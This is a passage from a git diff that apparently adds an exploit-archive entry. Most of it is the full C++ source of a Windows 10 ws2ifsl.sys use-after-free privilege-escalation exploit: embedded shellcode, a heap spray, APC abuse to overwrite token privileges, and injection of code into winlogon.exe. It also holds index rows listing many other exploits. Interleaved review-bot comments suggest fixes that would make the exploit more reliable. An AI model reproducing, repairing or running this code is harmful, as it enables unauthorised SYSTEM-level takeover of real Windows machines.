+"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \ +"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \ +"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \ +"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \ +"\x78\x65\x00"; + +static const unsigned int shellcode_len = 0x1000; + +#define MAXIMUM_FILENAME_LENGTH 255 +#define SystemModuleInformation 0xb +#define SystemHandleInformation 0x10 + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + ULONG ProcessId; + UCHAR ObjectTypeNumber; + UCHAR Flags; + USHORT Handle; + void* Object; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE, * PSYSTEM_HANDLE; + +typedef struct 
_SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE Handels[1]; +} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; + +typedef struct SYSTEM_MODULE { + ULONG Reserved1; + ULONG Reserved2; +#ifdef _WIN64 + ULONG Reserved3; +#endif + PVOID ImageBaseAddress; + ULONG ImageSize; + ULONG Flags; + WORD Id; + WORD Rank; + WORD w018; + WORD NameOffset; + CHAR Name[MAXIMUM_FILENAME_LENGTH]; +}SYSTEM_MODULE, * PSYSTEM_MODULE; + +typedef struct SYSTEM_MODULE_INFORMATION { + ULONG ModulesCount; + SYSTEM_MODULE Modules[1]; +} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; + +// exploit specific type information +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; // +0x0 + UCHAR Flags; // +4 + UCHAR EaNameLength; // +5 + USHORT EaValueLength; // +6 + CHAR EaName[1]; // +9 +} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION; + +typedef struct _PROC_DATA { + HANDLE apcthread; // +0x0 + void* unknown1; // +0x8 + void* unknown2; // +0x10 + void* unknown3; // +0x18 + void* unknown4; // +0x20 +} PROC_DATA, * PPROC_DATA; + +typedef struct _SOCK_DATA { + HANDLE unknown; // +0x0 + HANDLE procDataHandle; // +0x8 +} SOCK_DATA, * PSOCK_DATA; + +// undocumented apis definitions + +typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle, + HANDLE Event, + PIO_APC_ROUTINE ApcRoutine, + PVOID ApcContext, + PIO_STATUS_BLOCK IoStatusBlock, + PVOID Buffer, + ULONG Length, + PLARGE_INTEGER ByteOffset, + PULONG key); + +typedef NTSTATUS(WINAPI* NtTestAlert_t)(void); + +typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation); + +// resolved function pointers at runtime +NtTestAlert_t g_NtTestAlert = 0; +NtWriteFile_t g_NtWriteFile = 0; +RtlGetVersion_t g_RtlGetVersion = 0; + +HANDLE g_Event1 = NULL; +HANDLE g_Event2 = NULL; +HANDLE g_Event3 = NULL; + +int g_done1 = 0; +int g_done2 = 0; + +#define TOKEN_OFFSET 0x40 //_SEP_TOKEN_PRIVILEGES offset +#define OFFSET_LINKEDLIST 0xA8 //kthread apc offset + +// generic 
helper function + +void InjectToWinlogon() +{ + PROCESSENTRY32 entry; + entry.dwSize = sizeof(PROCESSENTRY32); + + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + + int pid = -1; + if (Process32First(snapshot, &entry)) + { + while (Process32Next(snapshot, &entry)) + { + if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0) + { + pid = entry.th32ProcessID; + break; + } + } + } + + CloseHandle(snapshot); + + if (pid < 0) + { + printf("Could not find process\n"); + return; + } + + HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (!h) + { + printf("Could not open process: %x", GetLastError()); + return; + } + + void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!buffer) + { + printf("[-] VirtualAllocEx failed\n"); + } + + if (!buffer) + { + printf("[-] remote allocation failed"); + return; + } + + if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0)) + { + printf("[-] WriteProcessMemory failed"); + return; + } + + HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0); + + if (hthread == INVALID_HANDLE_VALUE) + { + printf("[-] CreateRemoteThread failed"); + return; + } +} + +HMODULE GetNOSModule() +{ + HMODULE hKern = 0; + hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); + return hKern; +} + +DWORD64 GetModuleAddr(const char* modName) +{ + PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20); + + DWORD outBuffer = 0; + NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer); + + if (status == STATUS_INFO_LENGTH_MISMATCH) + { + free(buffer); + buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer); + status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer); + } + + if (!buffer) + { + printf("[-] NtQuerySystemInformation error\n"); + return 0; + } + + for 
(unsigned int i = 0; i < buffer->ModulesCount; i++) + { + PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress; + PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name; + if (_stricmp(kernelImage, modName) == 0) + { + free(buffer); + return (DWORD64)kernelImageBase; + } + } + free(buffer); + return 0; +} + + +DWORD64 GetKernelPointer(HANDLE handle, DWORD type) +{ + PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20); + + DWORD outBuffer = 0; + NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer); + + if (status == STATUS_INFO_LENGTH_MISMATCH) + { + free(buffer); + buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer); + status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer); + } + + if (!buffer) + { + printf("[-] NtQuerySystemInformation error \n"); + return 0; + } + + for (size_t i = 0; i < buffer->NumberOfHandles; i++) + { + DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber; + + if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type) + { + if (handle == (HANDLE)buffer->Handels[i].Handle) + { + //printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle); + DWORD64 object = (DWORD64)buffer->Handels[i].Object; + free(buffer); + return object; + } + } + } + printf("[-] handle not found\n"); + free(buffer); + return 0; +} + +DWORD64 GetGadgetAddr(const char* name) +{ + DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe"); + HMODULE mod = GetNOSModule(); + if (!mod) + { + printf("[-] leaking ntoskrnl version\n"); + return 0; + } + DWORD64 offset = (DWORD64)GetProcAddress(mod, name); + + DWORD64 returnValue = base + offset - (DWORD64)mod; + FreeLibrary(mod); + return returnValue; +} + +/* + After the bug is triggerd the first thime, this threads gets notified and it will trigger its 
function pointer, + which will call our gadget function and write the first 8 bytes. +*/ +DWORD WINAPI APCThread1(LPVOID lparam) +{ + SetEvent(g_Event1); + while (1) + { + if (g_done1) + { + printf("[+] triggering first APC execution\n"); + + g_NtTestAlert(); + + while (1) + { + Sleep(0x1000); + } + } + else + { + Sleep(1); + } + } + return 0; +} + +/* + After the bug is triggerd the second thime, this threads gets notified and it will trigger its function pointer again and write the second 8 bytes. + After that the shellcode is injected into the system process. +*/ +DWORD WINAPI APCThread2(LPVOID lparam) +{ + SetEvent(g_Event2); + while (1) + { + if (g_done2) + { + printf("[+] triggering second APC execution\n"); + + g_NtTestAlert(); + + InjectToWinlogon(); + SetEvent(g_Event3); + + while (1) + { + Sleep(0x1000); + } + } + else + { + Sleep(1); + } + } + return 0; +} + +HANDLE CreateSocketHandle(HANDLE procHandle) +{ + HANDLE fileHandle = 0; + UNICODE_STRING deviceName; + OBJECT_ATTRIBUTES object; + IO_STATUS_BLOCK IoStatusBlock; + + RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct"); + + InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); + + FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA)); + if (!eaBuffer) + { + printf("[-] malloc error\n"); + return fileHandle; + } + eaBuffer->NextEntryOffset = 0; + eaBuffer->Flags = 0; + eaBuffer->EaNameLength = sizeof("NifsSct") - 1; + eaBuffer->EaValueLength = sizeof(SOCK_DATA); + + RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1); + + SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4); + + eaData->unknown = (void*) 0x242424224; + eaData->procDataHandle = (void*) procHandle; + + NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 
0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA)); + if (status != STATUS_SUCCESS) + { + printf("[-] NtCreateFile error: %x \n", status); + free(eaBuffer); + return fileHandle; + } + + free(eaBuffer); + return fileHandle; +} + +HANDLE CreateProcessHandle(HANDLE hAPCThread) +{ + HANDLE fileHandle = 0; + UNICODE_STRING deviceName; + OBJECT_ATTRIBUTES object; + IO_STATUS_BLOCK IoStatusBlock; + + RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd"); + + InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); + + FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); + if (!eaBuffer) + { + printf("[-] malloc error\n"); + return fileHandle; + } + eaBuffer->NextEntryOffset = 0; + eaBuffer->Flags = 0; + eaBuffer->EaNameLength = sizeof("NifsPvd") - 1; + eaBuffer->EaValueLength = sizeof(PROC_DATA); + + RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1); + PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4); + + if (!hAPCThread) + { + printf("[-] error thread not found\n"); + free(eaBuffer); + return 0; + } + + eaData->apcthread = (void*) hAPCThread; // thread must be in current process + eaData->unknown1 = (void*) 0x2222222; // APC Routine + eaData->unknown2 = (void*) 0x3333333; // cancel Rundown Routine + eaData->unknown3 = (void*) 0x4444444; + eaData->unknown4 = (void*) 0x5555555; + + NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); + if (status != STATUS_SUCCESS) + { + printf("[-] NtCreateFile error: %x \n", status); + free(eaBuffer); + return fileHandle; + } + + free(eaBuffer); + return fileHandle; +} + +int DoHeapSpray(DWORD64 writeAddress, DWORD64 
kthreadAddress) +{ + DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop"); + if (!nopPointer) + { + printf("[-] SeSetAccessStateGenericMapping not found\n"); + return 0; + } + + DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping"); + if (!funPointer) + { + printf("[-] SeSetAccessStateGenericMapping not found\n"); + return 0; + } + + UCHAR payload[0x120 - 0x48]; + memset(payload, 0x0, sizeof(payload)); + + DWORD64 x = 0x41414141414141; + memcpy(payload, &x, 8); + + x = 0x12121212; + memcpy(payload + 8, &x, 8); + + x = kthreadAddress + OFFSET_LINKEDLIST; // apc linked list + memcpy(payload + 0x10, &x, 8); + + x = kthreadAddress + OFFSET_LINKEDLIST; + memcpy(payload + 0x18, &x, 8); + + x = funPointer; + memcpy(payload + 0x20, &x, 8); // this is the RIP we want to execute, in case of NtTestAlert + + x = nopPointer; + memcpy(payload + 0x28, &x, 8); // this is the RIP we want to execute, in case of rundown routine + + x = 0xffffffffffffffff; // this is to be written + memcpy(payload + 0x30, &x, 8); + + x = 0xffffffffffffffff; // this is to be written, but it gets changed.. + memcpy(payload + 0x38, &x, 8); + + x = 0x2424242424242424; + memcpy(payload + 0x40, &x, 8); + + x = writeAddress; // this is where to write + memcpy(payload + 0x48, &x, 8); + + for (size_t i = 0; i < 0x70; i++) + { + HANDLE readPipe; + HANDLE writePipe; + DWORD resultLength = 0; + + BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload)); + if (!res) + { + printf("[-] error creating pipe\n"); + return 0; + } + res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL); + } + + return 1; +} + +/* + This function will trigger the use after free in ws2ifsl.sys and + will try to reallocate the buffer with controlled content. +*/ +void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id) +{ + HANDLE procHandle = CreateProcessHandle(threadHandle); + printf("[!] 
procHandle %x\n", (DWORD)procHandle); + + HANDLE sockHandle = CreateSocketHandle(procHandle); + printf("[!] sockHandle %x\n", (DWORD)sockHandle); + + char* readBuffer = (char*)malloc(0x100); + DWORD bytesRead = 0; + + IO_STATUS_BLOCK io; + LARGE_INTEGER byteOffset; + byteOffset.HighPart = 0; + byteOffset.LowPart = 0; + byteOffset.QuadPart = 0; + byteOffset.u.LowPart = 0; + byteOffset.u.HighPart = 0; + ULONG key = 0; + + CloseHandle(procHandle); + + NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key); + + // this close the objecte and we trigger the use after free + CloseHandle(sockHandle); + + // this spray will reclaim the buffer + if (!DoHeapSpray(writeAddress, kthreadAddress)) + { + printf("[-] error doHeapSpray\n"); + return; + } + + if (id == 1) + { + g_done1 = 1; + } + + if (id == 2) + { + g_done2 = 1; + } + + printf("[+] done\n"); + Sleep(0x20); + free(readBuffer); + + return; +} + +/* + This function resolves all function pointer for native api calls. 
+*/ +bool InitFunctionPointers() +{ + HMODULE hNtDll = NULL; + hNtDll = LoadLibrary("ntdll.dll"); + if (!hNtDll) + { + printf("error\n"); + return false; + } + + g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert"); + if (!g_NtTestAlert) + { + printf("error\n"); + return false; + } + + g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile"); + if (!g_NtWriteFile) + { + printf("[-] GetProcAddress() NtWriteFile failed.\n"); + return false; + } + + g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion"); + if (!g_NtWriteFile) + { + printf("[-] GetProcAddress() RtlGetVersion failed.\n"); + return false; + } + + return true; +} + +int main() +{ + // intialize event for thread synchronization + g_Event1 = CreateEvent(0, 0, 0, 0); + g_Event2 = CreateEvent(0, 0, 0, 0); + g_Event3 = CreateEvent(0, 0, 0, 0); + + if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + + if (!InitFunctionPointers()) + { + printf("[-] InitFunctionPointers failed\n"); + return 0; + } + + HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); + if (!proc) + { + printf("[-] OpenProcess failed\n"); + return 0; + } + HANDLE token = 0; + if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token)) + { + printf("[-] OpenProcessToken failed\n"); + return 0; + } + + DWORD64 ktoken = GetKernelPointer(token, 0x5); + DWORD64 where = ktoken + TOKEN_OFFSET; + + printf("[+] found token at: %p\n", (DWORD64) ktoken); + + + // check the supported version of this exploit, otherwise we would crash + RTL_OSVERSIONINFOW osversion; + g_RtlGetVersion(&osversion); + + if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362) + { + printf("[+] version 
supported\n"); + } + else + { + printf("[-] sorry version not supported\n"); + return 0; + } + + HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0); + if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1) + { + printf("[-] error CreateThread\n"); + return 0; + } + + HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0); + if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2) + { + printf("[-] error CreateThread\n"); + return 0; + } + + DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8); + if (!threadAddrAPC1) + { + printf("[-] GetKernelPointer error \n"); + return 0; + } + DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8); + if (!threadAddrAPC2) + { + printf("[-] GetKernelPointer error \n"); + return 0; + } + + // wait for threads to be initialized + WaitForSingleObject(g_Event1, -1); + WaitForSingleObject(g_Event2, -1); + + TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1); + TriggerBug(hAPCThread2, where, threadAddrAPC2, 2); + + WaitForSingleObject(g_Event3, -1); + + ExitProcess(0); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1c47b4565..72d27ef6a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
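Review bot: `CreateSocketHandle` allocates the EA buffer with `sizeof(SOCK_DATA)` and sets `EaValueLength = sizeof(SOCK_DATA)`, but the `EaLength` passed to `NtCreateFile` is computed with `sizeof(PROC_DATA)` (0x28 versus 0x10), so the kernel is told the buffer is 0x18 bytes longer than the heap allocation and may read past it; the last argument should be `sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA)`. Two copy-paste checks are also wrong: `InitFunctionPointers` tests `if (!g_NtWriteFile)` after resolving `RtlGetVersion` (should be `if (!g_RtlGetVersion)`), and `main` tests `!g_Event2` for the third event (should be `!g_Event3`), so a failed resolve or event creation is not caught before the version gate that the comment says protects against a crash. `InjectToWinlogon` compares the `CreateRemoteThread` result against `INVALID_HANDLE_VALUE` although that API returns NULL on failure, and `GetModuleAddr`/`GetKernelPointer` ignore the status of the second `NtQuerySystemInformation` call and only check the malloc result, so a short buffer is parsed as if it were valid.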
@@ -10902,6 +10902,9 @@ id,file,description,date,author,type,platform,port
 47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
 47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows,
+47932,exploits/multiple/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,multiple,
+47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows,
+47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
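Review bot: The new index row for 47935 describes the target as `Microsoft Windows 10 (19H1 1901 x64)`, but 19H1 is version 1903 (build 18362, the only build the exploit's own version gate accepts), so `1901` looks like a typo that will defeat searches by version; the field should read `Microsoft Windows 10 (19H1 1903 x64)`. The row's date `2020-01-07` also differs from the 2020-01-15/16 dates of the sibling rows added in the same commit, which may be intentional (original publication date) but is worth confirming.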
@@ -17930,6 +17933,7 @@ id,file,description,date,author,type,platform,port
 47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
+47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -27862,7 +27866,7 @@ id,file,description,date,author,type,platform,port
 21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,webapps,php,
 21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
 21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
-21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
+21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Ertebat Gostar Co",webapps,php,
 21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,webapps,php,
 21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,webapps,php,
 21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",webapps,php,
@@ -36514,7 +36518,7 @@ id,file,description,date,author,type,platform,port
 35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",webapps,jsp,
 35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",webapps,php,
 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,
-35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",webapps,jsp,
+35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Ertebat Gostar Co",webapps,jsp,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,
 36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",webapps,php,
 35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",webapps,windows,8080
@@ -36532,7 +36536,7 @@ id,file,description,date,author,type,platform,port
 35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,webapps,php,
 35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,webapps,php,
 35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,webapps,php,
-35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",webapps,hardware,
+35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,
 35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",webapps,php,
 35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",webapps,multiple,
 35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",webapps,php,
@@ -37752,7 +37756,7 @@ id,file,description,date,author,type,platform,port
 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,
 37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,webapps,php,
 37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,webapps,php,
-37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
+37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Ertebat Gostar Co",webapps,php,
 37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,webapps,php,
 37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",webapps,php,
 37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",webapps,php,
@@ -42223,5 +42227,13 @@ id,file,description,date,author,type,platform,port
 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
 47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
 47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
-47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php,
+47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,
 47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,
+47925,exploits/php/webapps/47925.txt,"WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting",2020-01-16,V1n1v131r4,webapps,php,
+47926,exploits/php/webapps/47926.txt,"Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
+47927,exploits/java/webapps/47927.txt,"Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting",2020-01-16,"Ai Ho",webapps,java,
+47928,exploits/php/webapps/47928.txt,"Online Book Store 1.0 - Arbitrary File Upload",2020-01-16,Or4nG.M4N,webapps,php,
+47929,exploits/multiple/webapps/47929.rb,"Tautulli 2.1.9 - Denial of Service ( Metasploit )",2020-01-16,"Ismail Tasdelen",webapps,multiple,
+47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,
+47931,exploits/php/webapps/47931.txt,"Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
